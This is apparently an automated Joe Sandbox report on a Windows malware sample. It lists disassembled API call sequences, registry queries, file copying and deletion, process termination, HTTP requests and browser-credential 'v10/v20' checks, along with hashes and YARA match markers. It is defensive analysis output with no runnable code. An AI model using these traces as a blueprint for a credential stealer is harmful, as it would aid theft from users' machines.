                                            • memcmp.MSVCRT(?,v20,00000003), ref: 0040A57D
                                              • Part of subcall function 0041AA50: lstrcpy.KERNEL32(00420AF3,00000000), ref: 0041AA98
                                            • memcmp.MSVCRT(?,v10,00000003), ref: 0040A5D2
                                            • memset.MSVCRT ref: 0040A60B
                                            • LocalAlloc.KERNEL32(00000040,?), ref: 0040A664
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1920616957.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000000.00000002.1920616957.000000000053D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1920616957.0000000000549000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1920616957.000000000056E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1920616957.00000000006D6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1920616957.00000000006E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_8WOUWb5iEv.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: memcmp$AllocLocallstrcpymemset
                                            • String ID: @$v10$v20
                                            • API String ID: 631489823-278772428
                                            • Opcode ID: 954d5cad7f580f9cd40c0088cb8a78c697fd415e6e8ad607050bfdcf02893cf8
                                            • Instruction ID: deead5598e30f73acd49a71965db0b9c26184f2a73657d717c04d8255e3e8135
                                            • Opcode Fuzzy Hash: 954d5cad7f580f9cd40c0088cb8a78c697fd415e6e8ad607050bfdcf02893cf8
                                            • Instruction Fuzzy Hash: 7C518E30610208EFCB14EFA5DD95FDD7775AF40304F008029F90A6F291DB78AA55CB5A
                                            APIs
                                            • memset.MSVCRT ref: 023F158E
                                              • Part of subcall function 023F1507: GetProcessHeap.KERNEL32(00000000,00000104), ref: 023F151B
                                              • Part of subcall function 023F1507: RtlAllocateHeap.NTDLL(00000000), ref: 023F1522
                                              • Part of subcall function 023F1507: RegOpenKeyExA.ADVAPI32(000000FF,?,00000000,00020119,?), ref: 023F153E
                                              • Part of subcall function 023F1507: RegQueryValueExA.ADVAPI32(?,000000FF,00000000,00000000,?,000000FF), ref: 023F155C
                                              • Part of subcall function 023F1507: RegCloseKey.ADVAPI32(?), ref: 023F1566
                                            • lstrcat.KERNEL32(?,00000000), ref: 023F15B6
                                            • lstrlen.KERNEL32(?), ref: 023F15C3
                                            • lstrcat.KERNEL32(?,00426414), ref: 023F15DE
                                              • Part of subcall function 0240ACB7: lstrcpy.KERNEL32(00420E1A,00000000), ref: 0240ACFF
                                              • Part of subcall function 0240AF27: lstrlen.KERNEL32(?,006D6BF0,?,004250E4,00420E1A), ref: 0240AF3C
                                              • Part of subcall function 0240AF27: lstrcpy.KERNEL32(00000000), ref: 0240AF7B
                                              • Part of subcall function 0240AF27: lstrcat.KERNEL32(00000000,00000000), ref: 0240AF89
                                              • Part of subcall function 0240AE17: lstrcpy.KERNEL32(?,00420E1A), ref: 0240AE7C
                                              • Part of subcall function 02408F57: GetSystemTime.KERNEL32(00420E1B,006D6CA4,004205B6,?,?,023F1660,?,0000001A,00420E1B,00000000,?,006D6BF0,?,004250E4,00420E1A), ref: 02408F7D
                                              • Part of subcall function 0240AE97: lstrcpy.KERNEL32(00000000,?), ref: 0240AEE9
                                              • Part of subcall function 0240AE97: lstrcat.KERNEL32(00000000), ref: 0240AEF9
                                            • CopyFileA.KERNEL32(?,00000000,00000001), ref: 023F16CC
                                              • Part of subcall function 0240AD17: lstrcpy.KERNEL32(?,00000000), ref: 0240AD5D
                                              • Part of subcall function 023FA377: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 023FA3A3
                                              • Part of subcall function 023FA377: GetFileSizeEx.KERNEL32(000000FF,?), ref: 023FA3C8
                                              • Part of subcall function 023FA377: LocalAlloc.KERNEL32(00000040,?), ref: 023FA3E8
                                              • Part of subcall function 023FA377: ReadFile.KERNEL32(000000FF,?,00000000,023F16F6,00000000), ref: 023FA411
                                              • Part of subcall function 023FA377: LocalFree.KERNEL32(023F16F6), ref: 023FA447
                                              • Part of subcall function 023FA377: CloseHandle.KERNEL32(000000FF), ref: 023FA451
                                            • DeleteFileA.KERNEL32(00000000), ref: 023F1756
                                            • memset.MSVCRT ref: 023F177D
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1921333009.00000000023F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 023F0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_23f0000_8WOUWb5iEv.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: Filelstrcpy$lstrcat$CloseHeapLocallstrlenmemset$AllocAllocateCopyCreateDeleteFreeHandleOpenProcessQueryReadSizeSystemTimeValue
                                            • String ID:
                                            • API String ID: 3885987321-0
                                            • Opcode ID: 9501ecd15ebe4f0bd675d82c20a0d288bf0466f34ff5fe808b0cf600256a10e0
                                            • Instruction ID: 984b41df9d532820a14bb422d80e62ddb641bff0167b179b61cfd67b8607e93c
                                            • Opcode Fuzzy Hash: 9501ecd15ebe4f0bd675d82c20a0d288bf0466f34ff5fe808b0cf600256a10e0
                                            • Instruction Fuzzy Hash: 68512CB1D402289BCB25FB60DD94EED733AAF54701F4045AEA74A620D1EE305BC8CF95
                                            APIs
                                            • lstrcatA.KERNEL32(?,00A70B98,?,00000104,?,00000104,?,00000104,?,00000104), ref: 00414A2B
                                              • Part of subcall function 00418F70: SHGetFolderPathA.SHELL32(00000000,?,00000000,00000000,?,?,000003E8), ref: 00418F9B
                                            • lstrcatA.KERNEL32(?,00000000), ref: 00414A51
                                            • lstrcatA.KERNEL32(?,?), ref: 00414A70
                                            • lstrcatA.KERNEL32(?,?), ref: 00414A84
                                            • lstrcatA.KERNEL32(?,00A699A8), ref: 00414A97
                                            • lstrcatA.KERNEL32(?,?), ref: 00414AAB
                                            • lstrcatA.KERNEL32(?,00A71630), ref: 00414ABF
                                              • Part of subcall function 0041AA50: lstrcpy.KERNEL32(00420AF3,00000000), ref: 0041AA98
                                              • Part of subcall function 00418F20: GetFileAttributesA.KERNEL32(00000000,?,00410277,?,00000000,?,00000000,00420DB2,00420DAF), ref: 00418F2F
                                              • Part of subcall function 004147C0: GetProcessHeap.KERNEL32(00000000,0098967F), ref: 004147D0
                                              • Part of subcall function 004147C0: HeapAlloc.KERNEL32(00000000), ref: 004147D7
                                              • Part of subcall function 004147C0: wsprintfA.USER32 ref: 004147F6
                                              • Part of subcall function 004147C0: FindFirstFileA.KERNEL32(?,?), ref: 0041480D
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1920616957.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000000.00000002.1920616957.000000000053D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1920616957.0000000000549000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1920616957.000000000056E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1920616957.00000000006D6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1920616957.00000000006E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_8WOUWb5iEv.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: lstrcat$FileHeap$AllocAttributesFindFirstFolderPathProcesslstrcpywsprintf
                                            • String ID:
                                            • API String ID: 167551676-0
                                            • Opcode ID: b50baa58c06f86b24b53a457bfc21054e7bd1439383fcb662da6fefd690fe49e
                                            • Instruction ID: a5c2d428b28de13255d2ac7946ab4b1842291e6be0275f36c7222d1bbee1b90f
                                            • Opcode Fuzzy Hash: b50baa58c06f86b24b53a457bfc21054e7bd1439383fcb662da6fefd690fe49e
                                            • Instruction Fuzzy Hash: F93160B2D0421867CB14FBB0DC95EDD733EAB48704F40458EB20596091EE78A7C8CB99
                                            APIs
                                            • RegEnumKeyExA.ADVAPI32(00000000,00000000,?,00000400,00000000,00000000,00000000,00000000), ref: 004185B6
                                            • wsprintfA.USER32 ref: 004185E9
                                            • RegOpenKeyExA.ADVAPI32(00000000,?,00000000,00020019,00000000), ref: 0041860B
                                            • RegCloseKey.ADVAPI32(00000000), ref: 0041861C
                                            • RegCloseKey.ADVAPI32(00000000), ref: 00418629
                                              • Part of subcall function 0041AAB0: lstrcpy.KERNEL32(?,00000000), ref: 0041AAF6
                                            • RegQueryValueExA.ADVAPI32(00000000,00A70F58,00000000,000F003F,?,00000400), ref: 0041867C
                                            • lstrlenA.KERNEL32(?), ref: 00418691
                                            • RegQueryValueExA.ADVAPI32(00000000,00A71018,00000000,000F003F,?,00000400,00000000,?,?,00000000,?,00420B3C), ref: 00418729
                                            • RegCloseKey.ADVAPI32(00000000), ref: 00418798
                                            • RegCloseKey.ADVAPI32(00000000), ref: 004187AA
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1920616957.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000000.00000002.1920616957.000000000053D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1920616957.0000000000549000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1920616957.000000000056E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1920616957.00000000006D6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1920616957.00000000006E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_8WOUWb5iEv.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: Close$QueryValue$EnumOpenlstrcpylstrlenwsprintf
                                            • String ID: %s\%s
                                            • API String ID: 3896182533-4073750446
                                            • Opcode ID: 3131eed7b52e381784c663cb7396e085cc63190534808b605c4afb1523467a7a
                                            • Instruction ID: 130e8712b2d17d0f4a3aa70f9b32a38deb323cc32c4c6a80807e33934adfa5f1
                                            • Opcode Fuzzy Hash: 3131eed7b52e381784c663cb7396e085cc63190534808b605c4afb1523467a7a
                                            • Instruction Fuzzy Hash: 0F211B71A112189BDB24DB54DC85FE9B3B9FB48704F1081D9E609A6180DF746AC5CF98
                                            APIs
                                            • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 004199C5
                                            • Process32First.KERNEL32(0040A056,00000128), ref: 004199D9
                                            • Process32Next.KERNEL32(0040A056,00000128), ref: 004199F2
                                            • OpenProcess.KERNEL32(00000001,00000000,?), ref: 00419A4E
                                            • TerminateProcess.KERNEL32(00000000,00000000), ref: 00419A6C
                                            • CloseHandle.KERNEL32(00000000), ref: 00419A79
                                            • CloseHandle.KERNEL32(0040A056), ref: 00419A88
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1920616957.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000000.00000002.1920616957.000000000053D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1920616957.0000000000549000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1920616957.000000000056E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1920616957.00000000006D6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1920616957.00000000006E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_8WOUWb5iEv.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: CloseHandleProcessProcess32$CreateFirstNextOpenSnapshotTerminateToolhelp32
                                            • String ID:
                                            • API String ID: 2696918072-0
                                            • Opcode ID: d164d69eee064959a682f4fee3bb2d75b95a0ad327ad163940014db5e985719e
                                            • Instruction ID: 88ad4043d03276f3ee8d31f644ab7db47d0d0c060b431017ba6a9ada5f45e9a4
                                            • Opcode Fuzzy Hash: d164d69eee064959a682f4fee3bb2d75b95a0ad327ad163940014db5e985719e
                                            • Instruction Fuzzy Hash: 06211A70900258ABDB25DFA1DC98BEEB7B9BF48304F0041C9E509A6290D7789FC4CF51
                                            APIs
                                            • ??2@YAPAXI@Z.MSVCRT(00000800), ref: 023F4AA1
                                            • ??2@YAPAXI@Z.MSVCRT(00000800), ref: 023F4AB8
                                            • ??2@YAPAXI@Z.MSVCRT(00000800), ref: 023F4ACF
                                            • lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 023F4AF0
                                            • InternetCrackUrlA.WININET(00000000,00000000), ref: 023F4B00
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1921333009.00000000023F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 023F0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_23f0000_8WOUWb5iEv.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: ??2@$CrackInternetlstrlen
                                            • String ID: <
                                            • API String ID: 1683549937-4251816714
                                            • Opcode ID: 38fa8a5d9863c97f5ae2059ef35c5811aeca24f1de16073e8a310d0be37fc7a1
                                            • Instruction ID: 8d6b6befe8f4fabe0bddff8dbf383b7e0770b38956f7680b0e12521ff158f82b
                                            • Opcode Fuzzy Hash: 38fa8a5d9863c97f5ae2059ef35c5811aeca24f1de16073e8a310d0be37fc7a1
                                            • Instruction Fuzzy Hash: 0F2115B1D00219ABDF14DFA5EC49ADD7B75FF44320F108229E925AB2D0EB706A09CF95
                                            APIs
                                            • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 02409C2C
                                            • Process32First.KERNEL32(023FA2BD,00000128), ref: 02409C40
                                            • Process32Next.KERNEL32(023FA2BD,00000128), ref: 02409C59
                                            • OpenProcess.KERNEL32(00000001,00000000,?), ref: 02409CB5
                                            • TerminateProcess.KERNEL32(00000000,00000000), ref: 02409CD3
                                            • CloseHandle.KERNEL32(00000000), ref: 02409CE0
                                            • CloseHandle.KERNEL32(023FA2BD), ref: 02409CEF
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1921333009.00000000023F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 023F0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_23f0000_8WOUWb5iEv.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: CloseHandleProcessProcess32$CreateFirstNextOpenSnapshotTerminateToolhelp32
                                            • String ID:
                                            • API String ID: 2696918072-0
                                            • Opcode ID: d164d69eee064959a682f4fee3bb2d75b95a0ad327ad163940014db5e985719e
                                            • Instruction ID: 9b7a5e912553a78b8351e63e6a80ec204814524e411f88cf31b201015df7d757
                                            • Opcode Fuzzy Hash: d164d69eee064959a682f4fee3bb2d75b95a0ad327ad163940014db5e985719e
                                            • Instruction Fuzzy Hash: 72211A74D04218EBDB21DF51CC88BEEB7B5BB48704F0041D9E50AA6294D7749BC4CF91
                                            APIs
                                            • GetProcessHeap.KERNEL32(00000000,00000104), ref: 00417834
                                            • HeapAlloc.KERNEL32(00000000), ref: 0041783B
                                            • RegOpenKeyExA.ADVAPI32(80000002,00A6A498,00000000,00020119,00000000), ref: 0041786D
                                            • RegQueryValueExA.ADVAPI32(00000000,00A70F10,00000000,00000000,?,000000FF), ref: 0041788E
                                            • RegCloseKey.ADVAPI32(00000000), ref: 00417898
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1920616957.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000000.00000002.1920616957.000000000053D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1920616957.0000000000549000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1920616957.000000000056E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1920616957.00000000006D6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1920616957.00000000006E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_8WOUWb5iEv.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: Heap$AllocCloseOpenProcessQueryValue
                                            • String ID: Windows 11
                                            • API String ID: 3466090806-2517555085
                                            • Opcode ID: ece6f01e7d5fd4039499d2cf589e258aec5fff7bd7b06dda1c9cbde8cad395cd
                                            • Instruction ID: 90abcce2ecfc2a5b8cd512a74185dd25ab23219ddadcc09848e79f4871c60c5e
                                            • Opcode Fuzzy Hash: ece6f01e7d5fd4039499d2cf589e258aec5fff7bd7b06dda1c9cbde8cad395cd
                                            • Instruction Fuzzy Hash: FD01A274E09304BBEB00DBE4ED49FAE7779EF48700F00419AFA04A7290E7749A40CB55
                                            APIs
                                            • GetProcessHeap.KERNEL32(00000000,00000104), ref: 02407A9B
                                            • RtlAllocateHeap.NTDLL(00000000), ref: 02407AA2
                                            • RegOpenKeyExA.ADVAPI32(80000002,006D6D98,00000000,00020119,00000000), ref: 02407AD4
                                            • RegQueryValueExA.ADVAPI32(00000000,006D6E34,00000000,00000000,?,000000FF), ref: 02407AF5
                                            • RegCloseKey.ADVAPI32(00000000), ref: 02407AFF
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1921333009.00000000023F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 023F0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_23f0000_8WOUWb5iEv.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: Heap$AllocateCloseOpenProcessQueryValue
                                            • String ID: Windows 11
                                            • API String ID: 3225020163-2517555085
                                            • Opcode ID: ece6f01e7d5fd4039499d2cf589e258aec5fff7bd7b06dda1c9cbde8cad395cd
                                            • Instruction ID: 22a82164f2528eeacfcbbd8b31ee7107bb3114427920f5fd2d5128db573a1833
                                            • Opcode Fuzzy Hash: ece6f01e7d5fd4039499d2cf589e258aec5fff7bd7b06dda1c9cbde8cad395cd
                                            • Instruction Fuzzy Hash: D0016775E05305BBDB00DBE0DD89F6EB779EB44705F004156F605D7291E770AA40CB91
                                            APIs
                                            • GetProcessHeap.KERNEL32(00000000,00000104), ref: 004178C4
                                            • HeapAlloc.KERNEL32(00000000), ref: 004178CB
                                            • RegOpenKeyExA.ADVAPI32(80000002,00A6A498,00000000,00020119,00417849), ref: 004178EB
                                            • RegQueryValueExA.ADVAPI32(00417849,CurrentBuildNumber,00000000,00000000,?,000000FF), ref: 0041790A
                                            • RegCloseKey.ADVAPI32(00417849), ref: 00417914
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1920616957.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000000.00000002.1920616957.000000000053D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1920616957.0000000000549000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1920616957.000000000056E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1920616957.00000000006D6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1920616957.00000000006E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_8WOUWb5iEv.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: Heap$AllocCloseOpenProcessQueryValue
                                            • String ID: CurrentBuildNumber
                                            • API String ID: 3466090806-1022791448
                                            • Opcode ID: 14ae58864b366c4003c6da9e1b5cfb2a16c067edbf69ef05e192f5cb5c601d9e
                                            • Instruction ID: 4c9302de3449b24d107dc6acc84b9b99571be3b3dcaa7f8b3677a924de38e7e6
                                            • Opcode Fuzzy Hash: 14ae58864b366c4003c6da9e1b5cfb2a16c067edbf69ef05e192f5cb5c601d9e
                                            • Instruction Fuzzy Hash: 51014FB5E45309BBEB00DBE4DC4AFAEB779EF44700F10459AF605A6281E774AA408B91
                                            APIs
                                            • CreateFileA.KERNEL32(>=A,80000000,00000003,00000000,00000003,00000080,00000000,?,00413D3E,?), ref: 0041948C
                                            • GetFileSizeEx.KERNEL32(000000FF,>=A), ref: 004194A9
                                            • CloseHandle.KERNEL32(000000FF), ref: 004194B7
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1920616957.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000000.00000002.1920616957.000000000053D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1920616957.0000000000549000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1920616957.000000000056E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1920616957.00000000006D6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1920616957.00000000006E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_8WOUWb5iEv.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: File$CloseCreateHandleSize
                                            • String ID: >=A$>=A
                                            • API String ID: 1378416451-3536956848
                                            • Opcode ID: 81ae9b57d178cb6c2b2619f3187fe4d96e31a0019182dee87d4c099c60224e91
                                            • Instruction ID: 3a34b71ed32a5e038d40ec36a38ffc71a9509a973990dc3d9b0a1b42c7eefbe1
                                            • Opcode Fuzzy Hash: 81ae9b57d178cb6c2b2619f3187fe4d96e31a0019182dee87d4c099c60224e91
                                            • Instruction Fuzzy Hash: F2F04F39E08208BBDB10DFB0EC59F9E77BAAB48710F14C655FA15A72C0E6749A418B85
                                            APIs
                                            • RegOpenKeyExA.ADVAPI32(80000001,?,00000000,00020019,?), ref: 023F7601
                                            • RegEnumValueA.ADVAPI32(?,00000000,00000000,000000FF,00000000,00000003,?,?), ref: 023F7678
                                            • StrStrA.SHLWAPI(00000000,0042191C,00000000), ref: 023F76D4
                                            • GetProcessHeap.KERNEL32(00000000,?), ref: 023F7719
                                            • HeapFree.KERNEL32(00000000), ref: 023F7720
                                              • Part of subcall function 023F94F7: vsprintf_s.MSVCRT ref: 023F9512
                                            • task.LIBCPMTD ref: 023F781C
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1921333009.00000000023F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 023F0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_23f0000_8WOUWb5iEv.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: Heap$EnumFreeOpenProcessValuetaskvsprintf_s
                                            • String ID:
                                            • API String ID: 700816787-0
                                            • Opcode ID: a5f9a1fdff9748d1a9f61811aedc3a3ddb92c22d9917be86b6004c4e8ac4beea
                                            • Instruction ID: da5d687ad1b61c1d063d904b07c4f0132a42ca9aa788a8f5b4907be84dbd27ab
                                            • Opcode Fuzzy Hash: a5f9a1fdff9748d1a9f61811aedc3a3ddb92c22d9917be86b6004c4e8ac4beea
                                            • Instruction Fuzzy Hash: B9612CB591026C9BDB64DB50DC85FE9B7B9BF48300F0081EAE649A6150DB70ABC9CF91
                                            APIs
                                              • Part of subcall function 0240AD17: lstrcpy.KERNEL32(?,00000000), ref: 0240AD5D
                                              • Part of subcall function 023F6537: InternetOpenA.WININET(00420DFF,00000001,00000000,00000000,00000000), ref: 023F6598
                                              • Part of subcall function 023F6537: StrCmpCA.SHLWAPI(?,006D6E80), ref: 023F65BA
                                              • Part of subcall function 023F6537: InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 023F65EC
                                              • Part of subcall function 023F6537: HttpOpenRequestA.WININET(00000000,00421B58,?,006D6CB4,00000000,00000000,00400100,00000000), ref: 023F663C
                                              • Part of subcall function 023F6537: InternetSetOptionA.WININET(00000000,0000001F,?,00000004), ref: 023F6676
                                              • Part of subcall function 023F6537: HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 023F6688
                                              • Part of subcall function 0240AE17: lstrcpy.KERNEL32(?,00420E1A), ref: 0240AE7C
                                            • StrCmpCA.SHLWAPI(00000000,00421084,00000000), ref: 024057CF
                                            • lstrlen.KERNEL32(00000000), ref: 024057E6
                                              • Part of subcall function 02409227: LocalAlloc.KERNEL32(00000040,-00000001), ref: 02409249
                                            • StrStrA.SHLWAPI(00000000,00000000), ref: 0240581B
                                            • lstrlen.KERNEL32(00000000), ref: 0240583A
                                            • strtok.MSVCRT(00000000,?), ref: 02405855
                                            • lstrlen.KERNEL32(00000000), ref: 02405865
                                              • Part of subcall function 0240ACB7: lstrcpy.KERNEL32(00420E1A,00000000), ref: 0240ACFF
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1921333009.00000000023F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 023F0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_23f0000_8WOUWb5iEv.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: Internetlstrcpylstrlen$HttpOpenRequest$AllocConnectLocalOptionSendstrtok
                                            • String ID:
                                            • API String ID: 3532888709-0
                                            • Opcode ID: 54e8cafad978ddb8dec0665b67f894f20834dab0c8411e0b23f3d73ca0531f9d
                                            • Instruction ID: 6aa39783c1f1951564876f01affaf5e9cab7463a0dbd2ee5a1090cf444ded091
                                            • Opcode Fuzzy Hash: 54e8cafad978ddb8dec0665b67f894f20834dab0c8411e0b23f3d73ca0531f9d
                                            • Instruction Fuzzy Hash: B951E670900218ABCB18EF61DDD5EED7736AF10301F90447EEA0A665E0EF346A89CF51
                                            APIs
                                            • ??_U@YAPAXI@Z.MSVCRT(00064000), ref: 024075C5
                                              • Part of subcall function 0240ACB7: lstrcpy.KERNEL32(00420E1A,00000000), ref: 0240ACFF
                                            • OpenProcess.KERNEL32(001FFFFF,00000000,024077F4,004205C5), ref: 02407603
                                            • memset.MSVCRT ref: 02407651
                                            • ??_V@YAXPAX@Z.MSVCRT(?), ref: 024077A5
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1921333009.00000000023F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 023F0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_23f0000_8WOUWb5iEv.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: OpenProcesslstrcpymemset
                                            • String ID:
                                            • API String ID: 224852652-0
                                            • Opcode ID: 84a0e27ea1e6d6cd779c01b8e10f97d713d6d446aadd826403742b4761b04bd3
                                            • Instruction ID: 5704d8aca9b6d19d9c37e41fd60191ab3a144d47812461957cd663c3514ea92b
                                            • Opcode Fuzzy Hash: 84a0e27ea1e6d6cd779c01b8e10f97d713d6d446aadd826403742b4761b04bd3
                                            • Instruction Fuzzy Hash: 9F515BB0D002189BDB24EBA5DC84BEEB7B5AF04304F1085AED215672C1EB747AC8CF59
                                            APIs
                                            • memset.MSVCRT ref: 00414325
                                            • RegOpenKeyExA.ADVAPI32(80000001,00A716D0,00000000,00020119,?), ref: 00414344
                                            • RegQueryValueExA.ADVAPI32(?,00A721D0,00000000,00000000,00000000,000000FF), ref: 00414368
                                            • RegCloseKey.ADVAPI32(?), ref: 00414372
                                            • lstrcatA.KERNEL32(?,00000000,?,00000104), ref: 00414397
                                            • lstrcatA.KERNEL32(?,00A720E0), ref: 004143AB
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1920616957.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000000.00000002.1920616957.000000000053D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1920616957.0000000000549000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1920616957.000000000056E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1920616957.00000000006D6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1920616957.00000000006E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_8WOUWb5iEv.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: lstrcat$CloseOpenQueryValuememset
                                            • String ID:
                                            • API String ID: 2623679115-0
                                            • Opcode ID: b7a2b2d126f7ab3408effdadbb97cbe1cf7c5d5d93e5af13826bf428bfc09082
                                            • Instruction ID: 95163f332e2e8486d22fa14c8026e7b1b291c890fe90cbe7f90fb3e747a5c624
                                            • Opcode Fuzzy Hash: b7a2b2d126f7ab3408effdadbb97cbe1cf7c5d5d93e5af13826bf428bfc09082
                                            • Instruction Fuzzy Hash: B641B8B6D001086BDB14EBA0EC46FEE773DAB8C300F04855EB7155A1C1EA7557888BE1
                                            APIs
                                            • memset.MSVCRT ref: 0240458C
                                            • RegOpenKeyExA.ADVAPI32(80000001,006D6ED8,00000000,00020119,?), ref: 024045AB
                                            • RegQueryValueExA.ADVAPI32(?,006D6AD4,00000000,00000000,00000000,000000FF), ref: 024045CF
